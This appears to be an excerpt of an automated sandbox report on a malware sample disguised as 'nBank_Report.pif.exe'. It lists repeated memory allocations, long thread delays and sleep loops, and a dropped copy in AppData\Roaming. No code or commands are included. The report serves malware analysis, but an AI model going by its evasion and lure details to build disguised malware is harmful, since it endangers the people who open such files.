              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 4F30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 7C30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 8C30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 2710000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 28A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeMemory allocated: 48A0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599888Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598899Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598449Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597797Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597687Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597578Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597469Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597344Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597124Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597004Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596671Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596339Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595905Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595685Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595578Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595468Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595140Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594922Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 594484Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599891
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599781
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599645
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599531
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599422
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599313
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599203
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 599094
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598984
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598875
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598766
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598644
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598531
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598422
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598312
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598203
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 598094
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597969
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597859
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597750
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597641
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597531
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597422
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597309
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597203
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 597094
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596969
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596860
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596735
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596610
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596485
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596360
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596235
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 596110
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595985
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595860
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595719
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595610
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595485
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595344
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595219
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595109
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 595000
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594891
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594781
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594670
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594562
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594450
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeThread delayed: delay time: 594343
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7515Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2135Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeWindow / User API: threadDelayed 2184Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeWindow / User API: threadDelayed 7667Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeWindow / User API: foregroundWindowGot 1762Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeWindow / User API: threadDelayed 1869
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeWindow / User API: threadDelayed 7975
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -33204139332677172s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599888s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598899s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598449s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -598015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597469s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597124s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -597004s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596339s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -596015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595905s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595685s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -595031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -594922s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -594812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -594703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -594593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exe TID: 600Thread sleep time: -594484s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 7636Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep count: 34 > 30
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -31359464925306218s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -600000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6192Thread sleep count: 1869 > 30
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599891s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6192Thread sleep count: 7975 > 30
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599781s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599645s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599531s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599422s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599313s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -599094s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598984s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598766s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598644s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598531s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598422s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598312s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -598094s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597969s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597859s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597641s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597531s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597422s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597309s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -597094s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596969s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596860s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596735s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596610s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596485s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596360s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596235s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -596110s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595985s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595860s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595719s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595610s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595485s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595344s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595219s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595109s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -595000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -594891s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -594781s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -594670s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -594562s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -594450s >= -30000s
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe TID: 6240Thread sleep time: -594343s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599888Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598899Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598449Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597797Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597687Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597578Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597469Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597344Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597124Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 597004Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596671Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596339Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeThread delayed: delay time: 595905Jump to behavior
